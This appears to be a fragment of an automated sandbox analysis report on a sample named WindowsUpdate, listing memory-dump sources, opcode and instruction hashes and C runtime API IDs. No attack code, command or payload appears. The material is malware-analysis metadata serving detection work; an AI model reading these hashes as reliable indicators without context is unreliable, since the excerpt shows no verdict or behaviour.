    • Opcode ID: d7c94ceaaa6107eb7ed1b8c69fdcef2e1a69fe3788fd59d5c1df14236273b7ef
    • Instruction ID: 21bcc26ba5081e161017fcf533631005f3f154270c1e80147d4f80a9a1734d83
    • Opcode Fuzzy Hash: d7c94ceaaa6107eb7ed1b8c69fdcef2e1a69fe3788fd59d5c1df14236273b7ef
    • Instruction Fuzzy Hash: 5081C934408684CBD719CF1DD8C49A1B7E1FB99309B1482ADE8CACB25BE939D817CB54
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d2002ceb009d2c9912de999474934e43360d1609713566e6ebb985138cc3b10e
    • Instruction ID: f710734c2e2e8c5a38e0fccc83b6d2d2d535203f16e0b7cdcf0f661fb37f7844
    • Opcode Fuzzy Hash: d2002ceb009d2c9912de999474934e43360d1609713566e6ebb985138cc3b10e
    • Instruction Fuzzy Hash: C6A12021619BC98FD72ECB6C88504EEBFB0EF76100B844A9DD8C6E7B43C614E559C7A1
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: f1d4cf58abea7b864a4c7bfef70077653e8331d6fc89da353f5b905743404ccb
    • Instruction ID: 9623a6b76a83f50a04d6aba70a6bbca13030793eb4f6248e682b437e53dd5807
    • Opcode Fuzzy Hash: f1d4cf58abea7b864a4c7bfef70077653e8331d6fc89da353f5b905743404ccb
    • Instruction Fuzzy Hash: 4261083012CB994BD72E9A1C5845131FBE0FBAA315F1843ADE9D6C7283D924D453CBE6
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c26edc6e1c1501269fac7a9931112e239372f56631b3b5b85cd6935b26a4d4c5
    • Instruction ID: df117e9cbf372e21476e4db51b7b19058ab0605975bbd9d90dc8172ececff24a
    • Opcode Fuzzy Hash: c26edc6e1c1501269fac7a9931112e239372f56631b3b5b85cd6935b26a4d4c5
    • Instruction Fuzzy Hash: E261E43011CB844BD71DDA1D9895525BBE1FBEA305F18869DE8CAC7287CA34E453CBD2
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 52d3815f50e61f49ffa5fa51aad85644de4487aa5561d52189a1985097998492
    • Instruction ID: 932130957bdc2ddbbb455850942d4165c527174b52ff66fbc5ebf50ee0f2261f
    • Opcode Fuzzy Hash: 52d3815f50e61f49ffa5fa51aad85644de4487aa5561d52189a1985097998492
    • Instruction Fuzzy Hash: EC51C43152CB5C0AE72A9E78D44D3B9B7E1E7F7320F50125AE896C21D2DA61CC63C2A5
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 88d074c3de29e84f1399f39f51d235bb337769b72126f3afee03f2878cb5b881
    • Instruction ID: 3872336dc99c505d132e9ec8aa130181ff61a976c9a2f8b9556f3c7c7b2df401
    • Opcode Fuzzy Hash: 88d074c3de29e84f1399f39f51d235bb337769b72126f3afee03f2878cb5b881
    • Instruction Fuzzy Hash: 3451E53000CFC54ED72A9B2994051B6FFF1EFAB310B19869EE0EA83683D614E526C756
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 7021a1ba1e946de7c3e737bda4b3a77a3b71eb13e3c51145655dbeddf1e0d643
    • Instruction ID: b1b01bfb256ceb995701ff3d38e2a311322280b0ff1b1966b039d29bab975260
    • Opcode Fuzzy Hash: 7021a1ba1e946de7c3e737bda4b3a77a3b71eb13e3c51145655dbeddf1e0d643
    • Instruction Fuzzy Hash: A0714C601197C48EDB1ADF7D44841A67FF09B7A10170886DEECD9CA787C118D689C7B2
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: b79b6de12b2ada6463a758a0ef57e180fb4e656660e6a01602a7aa979e1cecc3
    • Instruction ID: 1115401bb1accf1e3b6e55bf509bdaa290b357836f32ffac756c5d6f86d2bcca
    • Opcode Fuzzy Hash: b79b6de12b2ada6463a758a0ef57e180fb4e656660e6a01602a7aa979e1cecc3
    • Instruction Fuzzy Hash: 4F41300022DCDA0DA70D822D1915530FFD0EAA928332C83AEF9DAE95C3D818C6D6C7E5
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 691ce1331103515b13d51ba9b323e388758da5798b353a293cdefc6482322abb
    • Instruction ID: 8f2af0e120e00d0eb5f07db0030a951e204f654a2277bb92da57454160f3422c
    • Opcode Fuzzy Hash: 691ce1331103515b13d51ba9b323e388758da5798b353a293cdefc6482322abb
    • Instruction Fuzzy Hash: 36517E202197C48EDB5ADF7D44841A67FF0DB7A101B0885DEECDACB387D518D64ACB62
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1edda47dbb9b15c5529a0a48df41674724a0e25f6d3adac6584d1c474ed8b8c7
    • Instruction ID: ae6015c1f01552389ef5f59c674b6d5a03347024b931ea8e2b0ef5327164f7b4
    • Opcode Fuzzy Hash: 1edda47dbb9b15c5529a0a48df41674724a0e25f6d3adac6584d1c474ed8b8c7
    • Instruction Fuzzy Hash: B351C03000DBC54ECB169B7994551B2FFF0EF6B321F19868EE4E986683C218E655C7A2
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1edda47dbb9b15c5529a0a48df41674724a0e25f6d3adac6584d1c474ed8b8c7
    • Instruction ID: 0d28e52fd21bd6dc451f03c32db621867ff9eda72044ef832e841a20b3b7b8e4
    • Opcode Fuzzy Hash: 1edda47dbb9b15c5529a0a48df41674724a0e25f6d3adac6584d1c474ed8b8c7
    • Instruction Fuzzy Hash: 9151E03000CBD54ECB168B7894451B2FFF0EF6B321F1A86CEE4E986683C214E555C7A2
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 83d9af8c6790764a277605a1e75cadf3f66b07bc3ca2a90717df41e73ee19f6e
    • Instruction ID: f265a6f92d200d1e28655c18e93ed2ec07afae9ed6046b161b202c2c956f1b04
    • Opcode Fuzzy Hash: 83d9af8c6790764a277605a1e75cadf3f66b07bc3ca2a90717df41e73ee19f6e
    • Instruction Fuzzy Hash: 2F41E9302285958FC71DCF1C98D1535BBE1EBDA306B09C1ADEDC6CB287C928D526CBA1
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e3025b074cf35e683014a30d1578ce1f8d5047f760644139d91856bf05c0127a
    • Instruction ID: 1c54cf60523289a510f9ff6e19d41ec902cad63163c430370762e76bbc6d7c8b
    • Opcode Fuzzy Hash: e3025b074cf35e683014a30d1578ce1f8d5047f760644139d91856bf05c0127a
    • Instruction Fuzzy Hash: C731C131328E494BDF4CDE2CC85A67933D2F7A8309B14567EE847C72E6DA34D8428B85
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6b0615b479b7a91f68ae1a9e27a03b4d5ee12cf8588eb5a9d803f239afc1481f
    • Instruction ID: 0de46600f7153d8237573c0811ebb5e69aaf76aac2106b581b63f0ded334c047
    • Opcode Fuzzy Hash: 6b0615b479b7a91f68ae1a9e27a03b4d5ee12cf8588eb5a9d803f239afc1481f
    • Instruction Fuzzy Hash: 4E31E520728BA54FA308993D48894357BD0E7DA30B39441BEF8DAC71A3DA38D547E7E5
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: aa4d2c802d0d433d92626876e2858a5a2af5341ceb511a673eb0f96ae7579dfa
    • Instruction ID: e22ef742e0db36b72f62dbd261b77a4fed115a336eed930a4cb77426be0294c9
    • Opcode Fuzzy Hash: aa4d2c802d0d433d92626876e2858a5a2af5341ceb511a673eb0f96ae7579dfa
    • Instruction Fuzzy Hash: E221742021DAC69ED30D866D6901064FFE0EA6A600728D76EF5DFC3B43D524E527C7EA
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 86ccce87b2b14fa470a83852fef3d8cf58e90f9dade9ee2a733e7aefd2b2bddf
    • Instruction ID: 2084fcb7f6341c7ce3548e4d7fc1c9e74246735795ecd4145e70eb18c36b8e8b
    • Opcode Fuzzy Hash: 86ccce87b2b14fa470a83852fef3d8cf58e90f9dade9ee2a733e7aefd2b2bddf
    • Instruction Fuzzy Hash: 87F02B22B6C56403571C487E286A23AB2C2D3D620B310D23EFECBD39C3DD34084765E9
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 32c72e14815b0a587c48383575dd2ba5f9259c8286b15177e09bacb5e12ecb41
    • Instruction ID: 8d9ce99fc0f3dd8365adca9c371e44f5039d0f9ea9f169b449274232f0d2eeba
    • Opcode Fuzzy Hash: 32c72e14815b0a587c48383575dd2ba5f9259c8286b15177e09bacb5e12ecb41
    • Instruction Fuzzy Hash: 7AF0C23276815407A30C883E58A6535B2C3E3DA607321D23DFECBC3983CD34044796E9
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a5374cc5611bc19f6640507c35c160bb5b1642721f95a3bf9f3ec5ae6519fa22
    • Instruction ID: de7982eb01d7fc7ea9954a123abd89378250d9126415666dabc142b2b0d67538
    • Opcode Fuzzy Hash: a5374cc5611bc19f6640507c35c160bb5b1642721f95a3bf9f3ec5ae6519fa22
    • Instruction Fuzzy Hash: 3DF0BB2175865507670C8C7E58A6175A1C7D3DA607320D13DFFCBC29C3DC74044B55E9
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 198daca5443bd49bd945e2e1aa80fc2103fafffc5749c1f763f42f6f5df33067
    • Instruction ID: d1023468a0d671a11c6a7233f7c3446d299604f1f16d6b52564ca15d107ddc24
    • Opcode Fuzzy Hash: 198daca5443bd49bd945e2e1aa80fc2103fafffc5749c1f763f42f6f5df33067
    • Instruction Fuzzy Hash: CEB092B5B121105A8B84ED3484A84B1F6B19B8B201F0020B9600AE70A4EE11D801CA18
    Memory Dump Source
    • Source File: 00000000.00000002.2931290282.00007FF7300A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7300A0000, based on PE: true
    • Associated: 00000000.00000002.2931266883.00007FF7300A0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2931332313.00007FF7300A3000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2931352471.00007FF7300A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2931384507.00007FF7300A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff7300a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 7ef51fdf445075620131bce95d9722f0d4399cdffa43972b5686f4bfbf193af5
    • Instruction ID: 1003413c99e3c96a4361199493c68e4a9faaf5cd67de248e86809452494502bb
    • Opcode Fuzzy Hash: 7ef51fdf445075620131bce95d9722f0d4399cdffa43972b5686f4bfbf193af5
    • Instruction Fuzzy Hash: 45A00222D0CD06F0EA44AB54E865572E334FB55308BC00031F51D416A8EF3CB530E334

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
    • String ID:
    • API String ID: 190073905-0
    • Opcode ID: 1bcaed9eda35ba992f7e29348d3af3b390d9174a36d9108e90f8fe65cf239a7c
    • Instruction ID: b699f2fa7fae080cfbf85e07f301f47258a4326fae29d0e0046c6cd480be9f03
    • Opcode Fuzzy Hash: 1bcaed9eda35ba992f7e29348d3af3b390d9174a36d9108e90f8fe65cf239a7c
    • Instruction Fuzzy Hash: 9491C83071CA05EBF756AB2CA85D3E9B2F1EBEA320F444119E405C32D7DA64C967C762

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: +$-
    • API String ID: 3215553584-2137968064
    • Opcode ID: fbf6cd382c2852d4e28143f915c8d0d860ebd4580120439a1f635061b0a62a20
    • Instruction ID: 6679cc75429b2aa56d4bec7865268e1b22946d1972e5093166bd488d87c9dc4c
    • Opcode Fuzzy Hash: fbf6cd382c2852d4e28143f915c8d0d860ebd4580120439a1f635061b0a62a20
    • Instruction Fuzzy Hash: 82C1D43010CA198EEB6ADB28D4897F9B7F0FBA7320F148159D49BC72DADA20D853C751

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: $a$r$w
    • API String ID: 3215553584-756186705
    • Opcode ID: 76e6e779ffc6c2a48241b956784a8cc011c624d01c85670fa86d22010ce8d801
    • Instruction ID: f9732e969a4776e207e98421039ffb2a997e2b70b8ce5bc44a48efdc75a84184
    • Opcode Fuzzy Hash: 76e6e779ffc6c2a48241b956784a8cc011c624d01c85670fa86d22010ce8d801
    • Instruction Fuzzy Hash: 8F81C37040C61E8AFB7B6A28969C3E5FBF0EBB7326F641919D092F21C2D7658807D301

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: $*
    • API String ID: 3215553584-3982473090
    • Opcode ID: dee95082375713012a0ee46cc4461d6a046e0bc004875f79c28932982656cf83
    • Instruction ID: 84ecd104aaa938889f22fec287530b3bd09e29acae161256b395eb89edce1125
    • Opcode Fuzzy Hash: dee95082375713012a0ee46cc4461d6a046e0bc004875f79c28932982656cf83
    • Instruction Fuzzy Hash: 0261577050C6848BEBAEAF18849C3F5BAB5BBA7328F54119DD8568A1D6C330C853C761
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: $*
    • API String ID: 3215553584-3982473090
    • Opcode ID: 980a9cffe64fdac3436792e900bb49151484fe00cda665722affd768e57de039
    • Instruction ID: b3c63304bba23544dd8d01d3af90e3c5d70be02a0c9b30eef63fde632e6ea26b
    • Opcode Fuzzy Hash: 980a9cffe64fdac3436792e900bb49151484fe00cda665722affd768e57de039
    • Instruction Fuzzy Hash: A561737011C6848FEF6EAF28C0CC3F4BAB0BBA7329F541199C8468A1D6C324C5A7C761
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo$_get_daylight
    • String ID:
    • API String ID: 72036449-0
    • Opcode ID: a8e5606c9b208da2959c5035297232c1de727985b8321145b172a1308e9046c1
    • Instruction ID: 1af4a6183e31f06ae6cbe3f9932ec6a978a7f89fe2188f38ae1db504ea7a4178
    • Opcode Fuzzy Hash: a8e5606c9b208da2959c5035297232c1de727985b8321145b172a1308e9046c1
    • Instruction Fuzzy Hash: 6B51983150C60C46F76B792C844DBEAE6A0E7E3334F25456AD85AFB2D2C766CC43C642
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: *?$.
    • API String ID: 3215553584-3972193922
    • Opcode ID: 5a742023445d716bea24937db52e92d8e4ee559647646a006248351805cd277c
    • Instruction ID: a19420a0d801fed24461acd2c9f48c23d94f3e461a941290ed0c46ffd288ac22
    • Opcode Fuzzy Hash: 5a742023445d716bea24937db52e92d8e4ee559647646a006248351805cd277c
    • Instruction Fuzzy Hash: 92717531628E1D4FDB59FB6C985D6E9B3E1FBE9320F04426ED449E32C6DA309842C6C1